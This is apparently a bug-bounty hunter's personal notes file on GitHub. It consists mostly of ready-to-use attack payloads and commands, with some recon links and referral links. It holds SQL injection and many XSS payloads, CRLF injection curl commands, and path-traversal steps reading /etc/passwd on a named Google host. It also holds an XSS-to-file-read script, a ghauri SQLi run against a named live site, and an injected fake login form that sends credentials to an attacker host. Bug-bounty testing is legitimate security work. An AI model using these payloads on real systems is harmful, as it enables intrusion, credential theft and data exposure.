-
Notifications
You must be signed in to change notification settings - Fork 2
/
KhelaHobe.txt
197 lines (153 loc) · 10.7 KB
/
KhelaHobe.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
https://www.kucoin.com/r/af/cryptocoin
Start Your Crypto Journey Now!: https://kcst.art/SXQbW9uyec
https://h1.security.nathan.sx/
https://twstalker.com/search/bug%20bounty#nav-tweets
https://r.xyz/bug-bounty/programs
0"XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR"Z
Recon Methodology | Resources🔽|
https://www.offensity.com/en/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/
https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology
https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/
https://infosecwriteups.com/recon-methodology-for-bug-hunting-e623120a7ca6
https://sidxparab.medium.com/best-bugbounty-recon-toolebe635d3b363-ebe635d3b363
https://vedanttekale20.medium.com/spend-more-time-doing-recon-youll-get-more-bugs-e7ffd5bf9202
https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/recon-and-osint/recon
AMAZON WAF: <a/+/OnMoUsEOVEr+=+(confirm)(document.domain)>
crlfi -i /home/lipon/Hacking/recon/urls.txt -o crlf.txt
ssti -l /home/lipon/Hacking/recon/urls.txt -o ssti.txt
RedirectHunter -l /home/lipon/Hacking/recon/urls.txt -o redirect.txt
Go to "https://peering.google.com/".
Open any picture in another window for example: "https://peering.google.com/static/images/couch-ipad.png".
Add one of this value at the end of the link: ("../../../../../../../etc/passwd") OR ("../../../../../../../proc/self/cmdline") OR ("../../../../../../../proc/self/stat") OR ("../../../../../../../proc/self/status").
In this way: "https://peering.google.com/static/images/couch-ipad.png../../../../../../../proc/self/cmdline".
%0D%0ASet-Cookie:crlfinjection=crlfinjection
%0d%0a%09headername:%20headervalue
%E5%98%8A%E5%98%8DSet-Cookie:%20test
%0aSet-Cookie:malicious_cookie1
%0d%0a%20InjectedBy:LipSec
$ curl -I -L http://info.hacker.one/%0d%0a%09headername:%20headervalue
$ curl -I http://info.hacker.one/%0d%0a%09X-Powered-By:%20headervalue
$ curl -I -L http://info.hacker.one/%0d%0a%09Location:%20http%3A%2F%2Fgoogle.com
$ curl -I http://info.hacker.one/%0d%0a%09foo:bar
HTTP Response Splitting (CRLF injection) due to headers overflow
https://hackerone.com/reports/53843
CRLF Injection to XSS
https://hackerone.com/reports/192667
https://team.badoo.com/%0d%0adata:text/html;text,%3Csvg%2fonload%3Dprompt%281%29%3E
http://account-global.ubnt.com/%3f%0dSet-Cookie:crlf=injection%3bdomain=.ubnt.com%3b
https://hackerone.com/reports/191380
https://hackerone.com/reports/192749
POC: https://youtu.be/w41mN2kTD9E
Tool: https://github.com/karthi-the-hacker/crlfi
Details: https://joshuaprovoste.com/crlf-injection-payloads/
https://gowthams.gitbook.io/bughunter-handbook/hackerone-reports
https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a
https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/refs/heads/main/chaos-bugbounty-list.json
"><img src=x onerror=alert(document.domain)>
javascript://%0aalert(1)
javascript:/**/%0aalert()
https://hackerone.com/stripe/policy_scopes
"><svg/onload=confirm(1)>"@x
'or 1=1 limit 1-- -
<!--><svg onload=alert(1)-->.asp<svg onload=alert(document.domain)>
ghauri -u "https://omnibookslibrary.com/login.php" --data="mobile=*&password=pass&login=" --batch --flush-session
ghauri -r req.txt --batch --flush-session --level 3
paramspider -d example.com
python3 /home/lipon/Hacking/tools/ex-param/ex-param.py -t https://nitolmotors.com.bd
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"
a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss
'><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
Sql Injection Payload
Payload : 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
Blind SQL Injection payload : if(now()=sysdate()%2Csleep(10)%2C0)
Tricky ASP blind SQL Injection in a login page. Payload: ';%20waitfor%20delay%20'0:0:6'%20--%20
>> https://x.com/brutelogic?mx=2
'"()><img src="x"><a href="https://google.com">click</a>
"><img src=x onerror=alert(document.cookie);>
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
file:/etc/passwd%3F/
file:///etc/x%252Fy/../passwd?/../passwd
JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//hello\76-->
waymore -i northwesternmutual.com -mode U -xcc -c ~/.config.yml
cd ~/.config/waymore/results
gau -subs northwesternmutual.com |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt
cat domains_list.txt | httpx -ports 80,443,8080,8443 -path /admin -mr "admin"
urlfinder -d tesla.com
uncover -q http.title:"GitLab" -silent | httpx -silent | nuclei
uncover -q target -f ip | naabu
echo jira | uncover -e shodan,censys -silent
Xss 💰 Methodology 💯
1- Pick a target
2- Do Full depth Subdomain enumeration using Subfinder( along API'S ) and use webcopilot or SubDomz and various subdomains finder tools in one liner and also ones perform subdomain bruteforicng and save it in a file.!!
3- subfinder -d example.com -all >> subs.txt
4- cat subs.txt | httpx -o alive-subs.txt
Method-1 ( Using Dalfox )
1- katana -u alive-subs.txt -o endpoints-1.txt
2- waybackurls http://example.com | grep = | tee endpoints-2.txt
3- ./gau example.com >> endpoints-3.txt
4- paramspider -d example.com
5 - cat alive-subs.txt | hakrawler | tee -a endpoints-5.txt
6- cat endpoints.txt | uro | tee -a endpoints-uro.txt ( Combine all URLS )
7- cat endpoints-uro.txt | Gxss | dalfox pipe --multicast --skip-mining-all
8- dalfox url http://example.com --custom-payload payloads.txt
Method-2 ( Using XSS_vibes )
1- katana -u alive-subs.txt -o endpoints-1.txt
2- waybackurls http://example.com | grep = | tee endpoints-2.txt
3- ./gau example.com >> endpoints-3.txt
4- paramspider -d example.com
5 - cat alive-subs.txt | hakrawler | tee -a endpoints-5.txt
6- cat endpoints.txt | uro | tee -a endpoints-uro.txt
7- cat endpoints-uro.txt | ./gf xss | sed 's/=.*/=/' -o output.txt
8- python3 main.py -f input.txt -o <output>
cat domains.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder
cat domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s ~/Tools/jaeles-signatures -u @
echo "testphp.vulnweb.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe
cat waymore.txt | grep -E -v '\.css($|\s|\?|&|#|/|\.)|\.js($|\s|\?|&|#|/|\.)|\.jpg($|\s|\?|&|#|/|\.)|\.JPG($|\s|\?|&|#|/|\.)|\.PNG($|\s|\?|&|#|/|\.)|\.GIF($|\s|\?|&|#|/|\.)|\.avi($|\s|\?|&|#|/|\.)|\.dll($|\s|\?|&|#|/|\.)|\.pl($|\s|\?|&|#|/|\.)|\.webm($|\s|\?|&|#|/|\.)|\.c($|\s|\?|&|#|/|\.)|\.py($|\s|\?|&|#|/|\.)|\.bat($|\s|\?|&|#|/|\.)|\.tar($|\s|\?|&|#|/|\.)|\.swp($|\s|\?|&|#|/|\.)|\.tmp($|\s|\?|&|#|/|\.)|\.sh($|\s|\?|&|#|/|\.)|\.deb($|\s|\?|&|#|/|\.)|\.exe($|\s|\?|&|#|/|\.)|\.zip($|\s|\?|&|#|/|\.)|\.mpeg($|\s|\?|&|#|/|\.)|\.mpg($|\s|\?|&|#|/|\.)|\.flv($|\s|\?|&|#|/|\.)|\.wmv($|\s|\?|&|#|/|\.)|\.wma($|\s|\?|&|#|/|\.)|\.aac($|\s|\?|&|#|/|\.)|\.m4a($|\s|\?|&|#|/|\.)|\.ogg($|\s|\?|&|#|/|\.)|\.mp4($|\s|\?|&|#|/|\.)|\.mp3($|\s|\?|&|#|/|\.)|\.bat($|\s|\?|&|#|/|\.)|\.dat($|\s|\?|&|#|/|\.)|\.cfg($|\s|\?|&|#|/|\.)|\.cfm($|\s|\?|&|#|/|\.)|\.bin($|\s|\?|&|#|/|\.)|\.jpeg($|\s|\?|&|#|/|\.)|\.JPEG($|\s|\?|&|#|/|\.)|\.ps.gz($|\s|\?|&|#|/|\.)|\.gz($|\s|\?|&|#|/|\.)|\.gif($|\s|\?|&|#|/|\.)|\.tif($|\s|\?|&|#|/|\.)|\.tiff($|\s|\?|&|#|/|\.)|\.csv($|\s|\?|&|#|/|\.)|\.png($|\s|\?|&|#|/|\.)|\.ttf($|\s|\?|&|#|/|\.)|\.ppt($|\s|\?|&|#|/|\.)|\.pptx($|\s|\?|&|#|/|\.)|\.ppsx($|\s|\?|&|#|/|\.)|\.doc($|\s|\?|&|#|/|\.)|\.woff($|\s|\?|&|#|/|\.)|\.xlsx($|\s|\?|&|#|/|\.)|\.xls($|\s|\?|&|#|/|\.)|\.mpp($|\s|\?|&|#|/|\.)|\.mdb($|\s|\?|&|#|/|\.)|\.json($|\s|\?|&|#|/|\.)|\.woff2($|\s|\?|&|#|/|\.)|\.icon($|\s|\?|&|#|/|\.)|\.pdf($|\s|\?|&|#|/|\.)|\.docx($|\s|\?|&|#|/|\.)|\.svg($|\s|\?|&|#|/|\.)|\.txt($|\s|\?|&|#|/|\.)|\.jar($|\s|\?|&|#|/|\.)|\.0($|\s|\?|&|#|/|\.)|\.1($|\s|\?|&|#|/|\.)|\.2($|\s|\?|&|#|/|\.)|\.3($|\s|\?|&|#|/|\.)|\.4($|\s|\?|&|#|/|\.)|\.m4r($|\s|\?|&|#|/|\.)|\.kml($|\s|\?|&|#|/|\.)|\.pro($|\s|\?|&|#|/|\.)|\.yao($|\s|\?|&|#|/|\.)|\.gcn3($|\s|\?|&|#|/|\.)|\.PDF($|\s|\?|&|#|/|\.)|\.egy($|\s|\?|&|#|/|\.)|\.par($|\s|\?|&|#|/|\.)|\.lin($|\s|\?|&|#|/|\.)|\.yht($|\s|\?|&|#|/|\.)' > filtered-extensions-links.txt
uro -i filtered-extensions-links.txt -o uro.txt
subprober -f uro.txt -sc -ar -o 1337.txt -nc -mc 200 301 302 307 308 403 -c 20
cat uro.txt | gf or
grep "=" uro.txt | sed 's/=\(.*\)/=/' | tee -a urls.txt
XSS => LFI
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
<script>document.write(%27<iframe%20src=file://///etc/hosts></iframe>%27);</script>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
"<zzz><style>@keyframes+x+{}</style><xss+style="animation-Name:+x"+onwebkitanimationstart="print()"></xss>
<body>
<a
href="https://webhook.site/ffe26c64-71e0-482b-b295-a9b931686e60"
referrerpolicy="unsafe-url"
>
click me
</a>
</body>
subfinder -d example.com -all -cs > main.txt ; cat main.txt | cut -d "," -f 1 > domains.txt ; rm -rf main.txt
cat domains.txt | httpx -title -wc -sc -cl -ct -location -web-server -asn -o alive-subdomains.txt
cat domains.txt | httpx -sc -ip -server -title -wc
nmap -sV -Pn -O 8.8.8.0/24
subfinder *.target.com >> Starget.txt
Gobuster dir -u https://target.com -w /usr/share/wordlists/common.txt
paramspider -d www.target.com >> Ptarget.txt
cat Starget.txt | httpx -status-code
cat Starget.txt | httpx >> 1live.txt
cat Ptarget.txt | httpx >> 2live.txt
<img src=x onerror=prompt(document.cookie)> “><img src=x onerror=alert(1)>.jpg
waybackurls target.com >> WB-target.com.txt
dirsearch -u https://target.com >> DS-target.com.txt
Parampsider -l alld.com.txt
Ran each .txt file with | httpx -status-code[].txt | httpx -mc 200 >> liveD.txt
cat WB-target.com.txt | kxss